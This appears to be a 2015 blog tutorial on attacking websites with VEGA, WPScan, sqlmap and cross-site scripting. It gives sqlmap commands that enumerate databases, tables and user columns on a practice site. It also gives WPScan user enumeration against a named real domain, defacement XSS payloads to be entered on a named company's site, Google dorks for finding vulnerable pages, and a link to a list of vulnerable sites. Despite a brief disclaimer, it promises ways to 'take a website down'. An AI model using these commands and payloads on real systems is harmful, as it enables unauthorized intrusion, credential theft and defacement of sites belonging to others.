Monday, 30 March 2015

Filled Under: ,

Exploiting Web Application using WPSCAN/SQLMAP/XSS/VEGA using Kali Linux

Post By - Tanmay | 3/30/2015 11:27:00 am


A post to make you alive again, with some cool steps you can take a website down.

Disclaimer : This post is for practice purpose only. Using this tricks without proper consent is illegal and it's your responsibility to obey all the law. We are not responsible for any misuse or damage cause by this tutorial.

Practice Web Site : testphp.vulnweb.com/listproducts.php?cat=1

Starting with scanning for vulnerability - 

- Set up Kali Linux in a Partition or in Virtual Machine.
- Open up : Application > Kali Linux > Web Application > Web Vulnerability Scanner > VEGA

// I hope you didn't have problem in doing that.

- So, see step by step after opening VEGA tool



After opening it - Go To Scan > Start New Scan


Enter the Web address, you can explore further if you like to otherwise just click on finish.

Remember, you can search for vulnerability on any webpage or site. Some sites also prizes you bounty on exploring bug and reporting to them ;)



The scan will take place. You can see the hierarchy in website view.


Now, BOOOOMMMM...

You've got  
XSS - 1
SQL - 1

Which we are going to use.



Information of WPSCAN : 

         __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_   \
           \  /\  /  | |     ____) | (__| (_| | | | |  |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

Used to scan Wordpress hosted websites. Can be use to enumerate user or database or tables from :

 wpscan --url www.cheaphai.com --enumerate u  

 You can explore more by using --help in wpscan.rb


Using SQLMAP to exploit a SQL Injection Vulnerable website

Opening a vulnerable website



http://testphp.vulnweb.com/listproducts.php?cat=1

doesn't creates much problem and looks like yellow gold but who knows
a " ' " can turn that gold in shit. (both are yellow though)



So, you've identified it lamely, that it is a vulnerable site. Much of talks till here.Now time for some action :

Paste it in terminal

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs  

here "--dbs" will enumerate the list of databases.


Could you see in the last line available databases :
[1] acuart
[2] information_schema

let's check the tables in 'acuart' -

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables  



Whoa!!

That was quick.

Now think, how can you enumerate PASSWORDS ;)

Time for XSS : Cross Site Scripting :

Cross Site Scripting is nothing but an vulnerability which can perform some serious problem to website like :  



So, thats an example.
If you know how to write a javascript you can do anything with XSS.

now, use Google Dork by typing these in Search Box :

inurl:item_id=inurl:review.php?id=
inurl:newsid=inurl:iniziativa.php?in=
inurl:trainers.php?id=inurl:curriculum.php?id=
inurl:news-full.php?id=inurl:labels.php?id=
inurl:news_display.php?getid=inurl:story.php?id=
inurl:index2.php?option=inurl:look.php?ID=
inurl:readnews.php?id=inurl:newsone.php?id=
inurl:top10.php?cat=inurl:aboutbook.php?id=


Literally, there are a lot of queries you can searc.

So, Go to these pages

http://testphp.vulnweb.com/search.php
http://www.chauvetlighting.com/



write 1 of below SCRIPT in their search boxes and see the magic
 
 <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1>Tutorial by - CS BEANS</h1></div>";</script>  
 <script>document.body.innerHTML="<style>body{ background-image:url('http://www.connectedrogers.ca/wp-content/uploads/2013/11/DespicableMe.jpg');}</style>";</script>  


For Bonus : 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns  

Open Paste bin here to get list of vulnerable website : http://pastebin.com/xd9Vxyn9

Now go and create your own script and check them out.

1 comments: